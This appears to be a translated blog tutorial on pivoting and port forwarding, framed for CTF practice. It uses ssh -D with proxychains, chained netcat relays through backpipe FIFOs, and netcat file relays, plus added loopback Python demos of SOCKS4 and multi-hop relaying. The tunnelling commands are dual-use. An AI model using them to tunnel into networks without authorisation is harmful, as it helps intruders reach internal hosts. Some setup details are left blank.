
Pivoting or port forwarding

I stumbled upon the article "SSH-tunnels - forwarding the port" and wanted to add to it.

So, what other ways of tunneling are there:

1. Dynamic SSH Access


Suppose we have SSH access to a network and want to reach other hosts and ports on it. The method described in the article above assumes we already know the host:port we want to reach. But what if we don't?

Dynamic access via SSH is useful here. To configure it, use the ssh -D option.

ssh -D 127.0.0.1:2222 user@remotehost 

After connecting, you get a dynamic SOCKS4 proxy server listening on your machine on port 2222 that provides access to the remote network (the bind address 127.0.0.1 keeps that listener off your other interfaces).

How to use this access? One option is to use proxychains.


The second option is to configure the address of this proxy server, 127.0.0.1:2222, directly in your browser. As a result, we can open any web server on the remote subnet.

It is no accident that ProxyChains has the word Chains in its name. It means you can build chains of proxies and thus tunnel through many subnets. How to do that, I leave for you to study on your own.
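To make the "socks4 proxy" above concrete, here is the handshake that a SOCKS4 client (proxychains, or a browser configured with that proxy address) performs against the ssh -D listener, with both sides written out. This is an added example, not code from the original post: the "proxy" here is a tiny mock SOCKS4 server on a loopback port that stands in for sshd's forwarder and simply echoes the first message back instead of connecting onward; the hostname intranet.example and the port 8080 are constructed values. It also shows the SOCKS4a form (destination IP 0.0.0.x plus a trailing hostname), which is what a browser sends when it hands the proxy a name rather than an address.

```python
import socket
import struct
import threading

SOCKS4_VERSION = 4
SOCKS4_CONNECT = 1
SOCKS4_GRANTED = 0x5A   # "request granted"
SOCKS4_REJECTED = 0x5B  # "request rejected or failed"


def build_socks4_connect(host, port, userid=""):
    """Build the SOCKS4 (or SOCKS4a) CONNECT request a client sends to the -D listener."""
    try:
        dst_ip = socket.inet_aton(host)
        hostname = b""
    except OSError:
        # SOCKS4a extension: destination IP 0.0.0.x means "resolve the hostname that
        # follows the user id" on the proxy side, which is what the browser case needs.
        dst_ip = b"\x00\x00\x00\x01"
        hostname = host.encode() + b"\x00"
    header = struct.pack("!BBH4s", SOCKS4_VERSION, SOCKS4_CONNECT, port, dst_ip)
    return header + userid.encode() + b"\x00" + hostname


def parse_socks4_reply(data):
    """Return True if the 8-byte SOCKS4 reply grants the request."""
    if len(data) != 8:
        raise ValueError("SOCKS4 reply must be exactly 8 bytes")
    vn, cd, _port, _ip = struct.unpack("!BBH4s", data)
    if vn != 0:
        raise ValueError("SOCKS4 reply must start with version byte 0")
    return cd == SOCKS4_GRANTED


def recv_exact(sock, n):
    """Read exactly n bytes (or fewer on EOF); recv() alone may return a short read."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def mock_socks4_server(listener, allowed_port, seen):
    """Stand-in for the ssh -D listener (hypothetical): parse one request, grant it only
    for allowed_port, then echo one message back in place of the remote service."""
    conn, _ = listener.accept()
    with conn:
        req = conn.recv(1024)
        vn, cd, port, ip = struct.unpack("!BBH4s", req[:8])
        userid, _, tail = req[8:].partition(b"\x00")
        host = socket.inet_ntoa(ip)
        if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:
            host = tail.partition(b"\x00")[0].decode()  # SOCKS4a hostname
        seen["host"], seen["port"], seen["userid"] = host, port, userid.decode()
        granted = vn == SOCKS4_VERSION and cd == SOCKS4_CONNECT and port == allowed_port
        status = SOCKS4_GRANTED if granted else SOCKS4_REJECTED
        conn.sendall(struct.pack("!BBH4s", 0, status, port, ip))
        if granted:
            conn.sendall(conn.recv(1024))


def connect_via_socks4(proxy_addr, host, port, payload, userid="demo"):
    """Client side: handshake with the proxy, then exchange one message with the target."""
    with socket.create_connection(proxy_addr) as s:
        s.sendall(build_socks4_connect(host, port, userid))
        if not parse_socks4_reply(recv_exact(s, 8)):
            return None
        s.sendall(payload)
        return s.recv(1024)


def demo(target_host="intranet.example", target_port=8080, payload=b"GET / HTTP/1.0\r\n\r\n"):
    """Run the mock proxy on a loopback port and push one request through it.
    Returns (response or None if rejected, what the proxy saw in the request)."""
    listener = socket.socket()
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    seen = {}
    server = threading.Thread(target=mock_socks4_server, args=(listener, 8080, seen))
    server.start()
    try:
        return connect_via_socks4(listener.getsockname(), target_host, target_port, payload), seen
    finally:
        server.join()
        listener.close()


if __name__ == "__main__":
    print(demo())
```

The request the client sends carries the destination host and port in cleartext inside the SSH session, so on the ssh -D listener itself (and in sshd's logs with sufficient verbosity) every target the pivot is used for is visible; that is also why the listener should stay bound to 127.0.0.1 rather than 0.0.0.0.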

2. NetCat Tunnels (nc)


Practice shows that many people simply do not know about this NetCat functionality. So, imagine a hypothetical situation:


This task is easily solved with the help of netcat tunnels. To do this, run the following commands on your machine:

 mknod backpipe p
 nc -lvp 1234 0<backpipe | nc -lvp 8443 1>backpipe 

You must have write access to the current directory to create the backpipe FIFO, and make sure that nothing else is listening on ports 1234 and 8443.

On the intermediate machine we do:

 mknod backpipe p
 nc __ 8443 0<backpipe | nc __ 22 1>backpipe 

You must have write access to the current directory to create the backpipe file here as well. Then, on our machine, we run ssh -p 1234 user@127.0.0.1 and get direct SSH access to the remote computer.

As a slight variation, you can use:

 mkfifo backpipe   # equivalent to mknod backpipe p
 nc -lvp 1234 0<backpipe | nc -lvp 8443 | tee backpipe 

Here it is important to understand that netcat clients and netcat listeners can be combined in any way, and the chain can be of any length. For example, here is the variant where we have direct access to each "intermediate computer".

Do not forget to create a backpipe on each machine!

On our machine:

 nc -lp 1234 0<backpipe | nc __ 443 1>backpipe 

On intermediate computer 1:

 nc -lp 443 0<backpipe | nc ___ 443 1>backpipe 

...

On the intermediate computer n:

 nc -lp 443 0<backpipe | nc _n+1__ 443 1>backpipe 

On the intermediate computer n + 1:

 nc -lp 443 0<backpipe | nc _ _ 1>backpipe 

You can also use any convenient ports and pipe names.
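What each hop in the chain above does, written out as a small TCP relay: accept one connection on a listening port, connect to the next hop, and pump bytes in both directions, which is exactly what the backpipe gives the nc pair (one nc carries the forward direction, the FIFO carries the reply direction back). This is an added example, not code from the original post; it is not netcat, and it builds the chain variant (every hop listens and connects onward), with an echo server on a loopback port standing in for the final SSH service. Ports are chosen by the OS, the payload is a constructed string, and the number of hops is a parameter, so the same code demonstrates a chain of any length.

```python
import socket
import threading


def pump(src, dst):
    """Copy bytes src -> dst until src closes, then pass the EOF on to dst.
    One call is one direction; the nc pair plus backpipe is two of these."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay_once(listener, next_hop):
    """One netcat-style hop: accept a single client, connect to next_hop,
    and join both directions until each side has closed."""
    client, _ = listener.accept()
    upstream = socket.create_connection(next_hop)
    reverse = threading.Thread(target=pump, args=(upstream, client))
    reverse.start()
    pump(client, upstream)
    reverse.join()
    client.close()
    upstream.close()


def listen_on_loopback():
    """Listening socket on 127.0.0.1 with an OS-assigned port."""
    s = socket.socket()
    s.bind(("127.0.0.1", 0))
    s.listen(1)
    return s


def echo_server_once(listener):
    """Stand-in for the service at the end of the chain (hypothetical): echo until EOF."""
    conn, _ = listener.accept()
    with conn:
        while True:
            data = conn.recv(4096)
            if not data:
                break
            conn.sendall(data)


def demo(hops=2, payload=b"SSH-2.0-demo\r\n"):
    """Build `hops` relays in front of the echo server, send payload through the
    outermost one, and return what comes back."""
    target = listen_on_loopback()
    threads = [threading.Thread(target=echo_server_once, args=(target,))]
    listeners = [target]
    next_hop = target.getsockname()
    for _ in range(hops):
        hop = listen_on_loopback()
        threads.append(threading.Thread(target=relay_once, args=(hop, next_hop)))
        next_hop = hop.getsockname()  # the next relay out points at this one
        listeners.append(hop)
    for t in threads:
        t.start()
    chunks = []
    with socket.create_connection(next_hop) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)  # our EOF travels hop by hop to the echo server
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    for t in threads:
        t.join()
    for l in listeners:
        l.close()
    return b"".join(chunks)


if __name__ == "__main__":
    print(demo(hops=3))
```

Two things this makes visible that the one-liners hide: every hop is an ordinary listening TCP socket (it shows up in ss -ltn or netstat on that machine, together with the nc process), and the bytes between hops are whatever the inner protocol provides, so an SSH session stays encrypted end to end while a plain file transfer does not.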

Similarly, you can transfer files from machine to machine.

For example, on our machine:

 nc -lp 443 >file.txt 

On the machine where the file is:

 nc -lp 443 <file.txt 

On an intermediate machine:

 nc __ 443 | nc ___ 443 

In this case there is no need to create a backpipe, since we are not maintaining a two-way session, but simply transferring one file in one connection.

Perhaps that's all. It helps me a lot in various CTFs; I hope it will come in handy for you.

Source: https://habr.com/ru/post/302168/
